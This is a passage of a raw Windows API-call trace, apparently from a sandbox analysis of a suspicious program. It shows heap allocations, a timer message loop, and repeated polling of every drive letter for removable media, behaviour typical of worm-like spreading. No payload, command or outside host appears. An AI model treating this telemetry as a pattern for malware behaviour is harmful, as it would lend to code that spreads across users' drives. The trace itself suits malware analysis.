lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0214.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0214.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0214.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.885] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0214.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0214.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0214.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0214.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.885] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.885] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.886] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.886] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.886] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.886] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.886] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.886] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.887] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.887] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.887] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.887] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.887] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.887] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.887] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.888] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.888] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.888] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.888] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.888] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.888] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.888] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.889] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.889] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.889] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.889] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.889] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0214.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0214.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0214.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.890] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f40 [0214.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f40 | out: hHeap=0x12c0000) returned 1 [0214.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0214.890] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0214.890] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.891] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.891] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.891] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.891] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.891] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.891] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.891] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0214.891] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0214.891] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.891] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 1 [0214.891] TranslateMessage (lpMsg=0x7dfde4) returned 0 [0214.891] DispatchMessageW (lpMsg=0x7dfde4) returned 0x0 [0214.892] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0214.892] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0214.892] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0214.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0214.892] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0214.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0214.892] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0214.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0214.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0214.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.892] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0214.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.893] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.893] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.893] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.893] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.893] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.893] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.893] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.894] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.894] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.894] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.894] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.894] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.894] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.895] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.895] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.895] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.895] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.895] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.895] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.896] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.896] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.896] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.896] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.896] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.896] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.897] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.897] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0214.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0214.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.897] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e00 [0214.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.898] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e00 | out: hHeap=0x12c0000) returned 1 [0214.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0214.898] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0214.898] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0214.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0214.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0214.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.898] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.898] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.898] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.898] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.899] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0214.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.899] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0214.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0214.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.899] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0214.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0214.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.899] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.899] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.899] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.900] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.900] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.900] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.900] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.900] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.900] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.900] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.901] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.901] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.901] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.901] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.902] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.902] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.902] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.902] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.902] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.903] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.903] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.903] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.903] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.903] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.903] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.903] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.904] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.904] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.904] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.904] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.904] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0214.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.933] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0214.933] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0214.933] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0214.933] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0214.933] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0214.933] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e80 [0214.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e80 | out: hHeap=0x12c0000) returned 1 [0214.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0214.933] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0214.933] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0214.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | 